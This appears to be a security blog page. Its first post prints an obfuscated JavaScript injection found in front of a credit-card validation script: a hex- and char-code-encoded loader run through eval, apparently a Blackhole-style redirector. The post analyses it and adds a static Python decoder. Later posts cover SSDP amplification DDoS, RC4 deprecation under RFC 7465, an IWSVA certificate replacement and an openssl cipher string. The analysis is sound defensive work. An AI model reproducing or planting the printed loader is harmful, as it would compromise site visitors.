x2c\x36\x30\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x36\x2c\x36\x31\x2c\x39\x31\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x33\x2c\x35\x38\x2c\x34\x37\x2c\x34\x37\x2c\x34\x39\x2c\x31\x30\x39\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x34\x2c\x34\x37\x2c\x34\x39\x2c\x31\x31\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x36\x2c\x33\x34\x2c\x39\x33\x2c\x35\x39\x2c\x34\x39\x2c\x31\x31\x31\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x30\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x33\x2c\x36\x31\x2c\x36\x36\x2c\x39\x31\x2c\x31\x31\x36\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x32\x2c\x34\x30\x2c\x31\x31\x36\x2c\x34\x36\x2c\x38\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x36\x36\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x31\x2c\x39\x33\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x31\x32\x35\x2c\x33\x39\x2c\x34\x34\x2c\x35\x34\x2c\x35\x30\x2c\x34\x34\x2c\x34\x39\x2c\x34\x38\x2c\x35\x34\x2c\x34\x34\x2c\x33\x39\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\
x30\x31\x2c\x31\x32\x30\x2c\x37\x39\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x32\x2c\x35\x30\x2c\x35\x31\x2c\x35\x30\x2c\x35\x35\x2c\x35\x32\x2c\x35\x36\x2c\x34\x39\x2c\x35\x32\x2c\x34\x39\x2c\x35\x33\x2c\x34\x39\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x37\x2c\x39\x38\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x30\x2c\x34\x38\x2c\x34\x39\x2c\x35\x37\x2c\x35\x32\x2c\x35\x32\x2c\x35\x36\x2c\x35\x35\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x35\x2c\x39\x35\x2c\x31\x30\x33\x2c\x39\x37\x2c\x31\x30\x35\x2c\x31\x30\x30\x2c\x31\x32\x34\x2c\x37\x31\x2c\x36\x35\x2c\x34\x39\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x37\x36\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x36\x37\x2c\x39\x37\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x30\x38\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x37\x37\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x39\x37\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x35\x2c\x31\x31\
x36\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x37\x39\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x39\x39\x2c\x31\x31\x37\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x38\x34\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x35\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x39\x37\x2c\x31\x31\x38\x2c\x31\x30\x35\x2c\x31\x30\x33\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x30\x34\x2c\x39\x37\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x30\x38\x2c\x31\x31\x37\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x35\x31\x2c\x35\x33\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x31\x35\x2c\x36\x36\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x35\x34\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x31\x37\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x36\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\
x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x36\x38\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x33\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x36\x38\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x36\x2c\x34\x38\x2c\x31\x32\x34\x2c\x35\x36\x2c\x35\x34\x2c\x35\x32\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x38\x34\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x37\x30\x2c\
x31\x31\x37\x2c\x31\x30\x38\x2c\x31\x30\x38\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x37\x2c\x39\x38\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x35\x30\x2c\x34\x38\x2c\x34\x39\x2c\x35\x33\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x39\x37\x2c\x31\x30\x38\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x34\x38\x2c\x35\x36\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x30\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x34\x39\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x39\x38\x2c\x31\x31\x34\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x37\x36\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x37\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x37\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x31\x39\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x31\x31\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x31\x30\x38\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\
x34\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x30\x32\x2c\x31\x30\x31\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x30\x37\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x30\x35\x2c\x31\x30\x30\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x34\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x30\x38\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x38\x32\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x36\x39\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x37\x31\x2c\x37\x37\x2c\x38\x34\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x39\x2c\x39\x37\x2c\x31\x31\x36\x2c\x39\x39\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x34\x39\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x35\x30\x2c\x35\x32\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x30\x35\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x33\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x32\x31\x2c\x39\x37\x2c\x31\x30\x34\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x31\x31\x37\x2c\x31\x30\x38\x2c\x31\x30\x38\x2c\x31\x32\x34\x2c\x39\x38\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x33\x39\x2c\x34\x36\x2c\x31\x31\x35\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x34\x30\x2c\x33\x39\x2c\x31\x32\x34\x2c\x33\x39\x2c\x34\x31\x2c\x34\x34\x2c\x34\x38\x2c\x34\x34\x2c\x31\x32\x33\x2c\x31\x32\x35\x2c\
x34\x31\x2c\x34\x31\x2c\x31\x30"
t=window["\x65\x76\x61\x6c"]("String.fromCharCode("+t+")");window["\x65\x76\x61\x6c"](t);
// You have permission to copy and use this javascript provided that
// the content of the script is not changed in any way.

function validateCreditCard(s) {
    // remove non-numerics
    var v = "0123456789";
    var w = "";
    for (i=0; i < s.length; i++) {
        x = s.charAt(i);
        if (v.indexOf(x,0) != -1)
        w += x;
    }
    // validate number
    j = w.length / 2;
    k = Math.floor(j);
    m = Math.ceil(j) - k;
    c = 0;
    for (i=0; i<k; i++) {
        a = w.charAt(i*2+m) * 2;
        c += a > 9 ? Math.floor(a/10 + a%10) : a;
    }
    for (i=0; i<k+m; i++) c += w.charAt(i*2+1-m) * 1;
    return (c%10 == 0);
}

Notice anything? Yep, the third and fourth lines look awfully strange. Eerily strange even. What should be obvious is that nothing is obvious, except that there is probably some JavaScript obfuscation going on. JavaScript obfuscation is used regularly by bad guys trying to evade malware and exploit detection by IDS/IPS and such, or even by supposedly “good” guys that are like “don’t steal my code, dude!!!1”. While obfuscation by compressing JavaScript (removing unnecessary whitespace for faster load/browser execution) is understandable, I find the latter rather questionable, but whatever.
For some fun JavaScript obfuscation samples check out jjencode and aaencode by Yosuke Hasegawa.

At least in this example the obfuscated part appears very out of place, so it’s safe to assume these lines were injected with some malicious intent. VirusTotal also shows that McAfee and TrendMicro detect the file as malicious with their respective heuristic signatures BehavesLike.JS.ExploitBlacole.mx and HEUR_HTJS.HDJSFN.
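The injected lines follow a two-layer pattern: a string of `\xNN` escapes that decodes to comma-separated decimal character codes, which is then passed through `String.fromCharCode` and `eval`. The following added example (not part of the original post) peels both layers statically in Python without executing anything; the function names and the harmless sample built by `make_sample` are constructed for illustration.

```python
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# A double-quoted literal made up of nothing but \xNN escapes.
HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
CHAR_CODES = re.compile(r"\d{1,5}(?:,\d{1,5})*")


def unescape_hex(text):
    """Turn every \\xNN escape into its character; nothing is evaluated."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def decode_layers(js_source):
    """Statically peel both layers; returns (hidden identifiers, stage-2 sources)."""
    # Rejoin hard-wrapped lines so an escape split across a line break still matches.
    compact = js_source.replace("\r", "").replace("\n", "")
    literals = [unescape_hex(lit) for lit in HEX_LITERAL.findall(compact)]
    # Short escaped strings hide property names such as "eval".
    identifiers = sorted({lit for lit in literals if lit.isidentifier()})
    # A list of decimal char codes is what String.fromCharCode would receive;
    # the mask mirrors its truncation of each code to 16 bits.
    stage2 = [
        "".join(chr(int(code) & 0xFFFF) for code in lit.split(","))
        for lit in literals
        if CHAR_CODES.fullmatch(lit)
    ]
    return identifiers, stage2


def make_sample(inner_js):
    """Build a constructed sample in the same two-layer shape as the injected lines."""
    codes = ",".join(str(ord(ch)) for ch in inner_js)
    escaped = "".join("\\x%02x" % ord(ch) for ch in codes)
    return (
        't="' + escaped + '";\n'
        't=window["\\x65\\x76\\x61\\x6c"]("String.fromCharCode("+t+")");'
        'window["\\x65\\x76\\x61\\x6c"](t);'
    )


if __name__ == "__main__":
    sample = make_sample('document.title="constructed sample";')  # harmless stand-in
    names, stages = decode_layers(sample)
    print("hidden identifiers:", names)
    for source in stages:
        print("stage 2:", source)
```

The recovered stage-2 text may itself be packed or obfuscated again, so treat it as the input to the next round of static analysis rather than as the final payload.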

Analyzing and coping with a SSDP amplification DDoS attack

A while ago we were hit by an amplification/reflection DDoS attack against our public-facing network. I was familiar with NTP and DNS based reflection DDoS attacks, but this one employed the Simple Service Discovery Protocol (SSDP) to flood our tubes, a name I’d heard before and seen in packet traces randomly, but hardly knew anything about to be honest.
SSDP is a UDP-based protocol for service discovery and UPnP functionality with an HTTP-like syntax. It’s deployed by modern operating systems and embedded systems like home routers, where it is sometimes enabled even on their external interfaces, which makes this kind of attack possible.

The Shadowserver Foundation has a nice website with lots of information and statistics on public SSDP-enabled devices. While the number of open or vulnerable DNS and NTP servers is going down steadily, there are currently around 14 million IPs around the world that respond to SSDP requests, and the number is only declining very slowly.

Due to this we can expect that SSDP will be abused for DDoS attacks more often in the future.

RC4 officially deprecated by RFC 7465

A new RFC 7465 has now been published that effectively calls for disabling RC4 everywhere:

   o  TLS clients MUST NOT include RC4 cipher suites in the ClientHello message.

   o  TLS servers MUST NOT select an RC4 cipher suite when a TLS client
      sends such a cipher suite in the ClientHello message.

   o  If the TLS client only offers RC4 cipher suites, the TLS server
      MUST terminate the handshake.  The TLS server MAY send the
      insufficient_security fatal alert in this case.
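
The three rules, applied to the raw `cipher_suites` vector of a ClientHello, as an added example that is not part of the original post or of the RFC. The function names and test vectors are constructed; the RC4 table is only a subset of the registered RC4 code points, and the handling of signalling values and of a missing overlap goes slightly beyond the quoted text.

```python
import struct

# RC4 code points from the IANA TLS Cipher Suites registry (a subset, for illustration).
RC4_SUITES = {
    0x0004: "TLS_RSA_WITH_RC4_128_MD5",
    0x0005: "TLS_RSA_WITH_RC4_128_SHA",
    0xC007: "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA",
    0xC011: "TLS_ECDHE_RSA_WITH_RC4_128_SHA",
}
# Signalling values that ride in the same vector but are not real cipher suites.
SIGNALLING = {0x00FF, 0x5600}  # renegotiation-info SCSV, fallback SCSV
ALERT_FATAL, HANDSHAKE_FAILURE, INSUFFICIENT_SECURITY = 2, 40, 71


def parse_cipher_suites(vector):
    """Parse the ClientHello cipher_suites vector: 2-byte length, then 2-byte IDs."""
    if len(vector) < 4:
        raise ValueError("cipher_suites vector too short")
    (length,) = struct.unpack_from("!H", vector)
    if length % 2 or length != len(vector) - 2:
        raise ValueError("malformed cipher_suites length")
    return list(struct.unpack_from("!%dH" % (length // 2), vector, 2))


def fatal_alert(description, version=(3, 3)):
    """TLS alert record: type 21, version, length 2, then level and description."""
    return struct.pack("!BBBHBB", 21, version[0], version[1], 2, ALERT_FATAL, description)


def server_select(vector, server_preference):
    """Return (chosen suite, None) or (None, alert record to send before closing)."""
    offered = parse_cipher_suites(vector)
    usable = [s for s in offered if s not in RC4_SUITES and s not in SIGNALLING]
    if not usable:
        # Client offered only RC4: terminate, optionally with insufficient_security.
        return None, fatal_alert(INSUFFICIENT_SECURITY)
    for suite in server_preference:
        # RC4 is never selected, even if a stale preference list still contains it.
        if suite in usable:
            return suite, None
    return None, fatal_alert(HANDSHAKE_FAILURE)


def client_violations(vector):
    """RC4 suites a client offered although the first rule forbids it."""
    return [RC4_SUITES[s] for s in parse_cipher_suites(vector) if s in RC4_SUITES]
```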

Cryptographic weaknesses around RC4 have been known for many years, but at the beginning of 2013 they finally became feasible to exploit with a considerable, but not prohibitive, effort.
The author of the RFC is from Microsoft, which published an advisory for disabling RC4 in November 2013 as well. However, Windows Server 2012 R2 with IIS 8.5, which was released in October 2013, still ships with RC4 enabled by default.

A lot of websites and “modern” software still use RC4 today. According to the SSL-Pulse statistics currently more than 60% of all SSL/TLS enabled websites still offer RC4.

It depends on the service and the security requirements, but at the moment I personally don’t see that much of a problem in offering RC4 as a fallback, if you always prefer other secure ciphers.

Here are some examples of software or websites that still use RC4 in a manner it shouldn’t be used:

  • PayPal (server prefers RC4, though offers AES as well)
  • YouTube (the servers providing the actual video streams, not the general site; RC4 exclusively(!)). I tested it last week, but it seems like YouTube switched to offering and preferring other AES-based cipher suites just recently.
  • All versions of Windows Server and client OSes, including the respective Internet Explorer versions, enable RC4 by default
  • Some VMware products (at least the vCenter Web Client, and many virtual appliances; most seem to prefer AES though; ESXi hosts and vCenter service on port 443 and SSO on 7444 do not support RC4)
  • HP ILO interfaces (confirmed with ILO4 2.03, ILO3 1.80; prefers RC4)
  • Cisco IronPort Mail appliances seem to be using RC4 exclusively(!)
  • Check Point Gaia Portal web interface (tested with R77.20 with JHFA Take 77; RC4 exclusively(!))

Seems like there’s a lot of work waiting for vendors and website admins to disable RC4.
It’s a mystery to me how some popular websites or recent software releases can be released without support for any cipher suite besides RC4. And no, mitigating BEAST is not a valid excuse.

Replacing the IWSVA Admin Web Interface SSL Certificate

Since documentation on this by Trend Micro is pretty sparse and I’ve had to do this on a number of systems recently, I’ll document the process of replacing or adding a certificate for the IWSVA Admin Web Console with a new CA-signed one here.

Note: This documentation is NOT for replacing the IWSVA SSL-Inspection certificate, though similarities may exist.
I’ve done this successfully on IWSVA 5.6 and 6.5; the process should work without issues on IWSVA 6.0 as well.

The whole process of requesting/creating/converting the SSL certificate described here mainly involves openssl commands and can be done from the IWSVA root shell. I also generally recommend always creating at least the certificate public/private key pair on the system that will end up hosting the certificate. If you create key pairs on a different system, you have to transfer the key over the network or by some other means, which increases the risk of the private key being compromised (yes, you can encrypt the keys, but it’s best if the key never leaves the target system in the first place).

Secure Cipher-Suites for Qualys SSL Labs server test A/A+ rating

There are many possible ways to configure your server to support only secure cipher-suites and get an A/A+ rating from the SSL Labs SSL Test, some are more restrictive than others, some are more complex than others.

There is no single holy grail, but for openssl-based applications such as Apache, postfix, or nginx, I prefer the following general notation, which I personally find more readable and more sensible:
HIGH:!aNULL:!eNULL:!kECDH:!aDH:!RC4:!3DES:!CAMELLIA:!MD5:!PSK:!SRP:!KRB5:@STRENGTH

Checking the openssl documentation, this boils down to the following logic:

  • Only enable strong (High) encryption cipher suites (at least 128 bit length)
  • Exclude cipher-suites without authentication (aNULL) or without encryption (eNULL)
  • Exclude fixed/static ECDH key exchange (kECDH), as opposed to ephemeral ECDHE keys (no PFS, rarely used)
  • Exclude cipher-suites using DH authentication (aDH), which is rarely used and needs the certificate to have static DH keys
  • Exclude RC4 and 3DES cipher-suites which are known to be weak or outdated
  • Exclude Camellia cipher-suites, which are rarely used/preferred by clients/servers when AES is already supported. AES is the de-facto standard
  • Exclude outdated cipher-suites using weak MD5 HMAC
  • Exclude cipher-suites used extremely rarely or only in very specific applications like Secure Remote Password authentication (SRP), PSK (Pre-Shared Key) and KRB5 (Kerberos5, also supports only old ciphers/HMAC)
  • Sort the cipher list by strength

With at least the recent openssl 1.0.1j version, this will enable a broad range of 30 secure AES-based cipher suites, including some basic non-PFS AES suites for compatibility reasons (decide for yourself if you’re OK with this). This guarantees an SSL test rating of at least A.
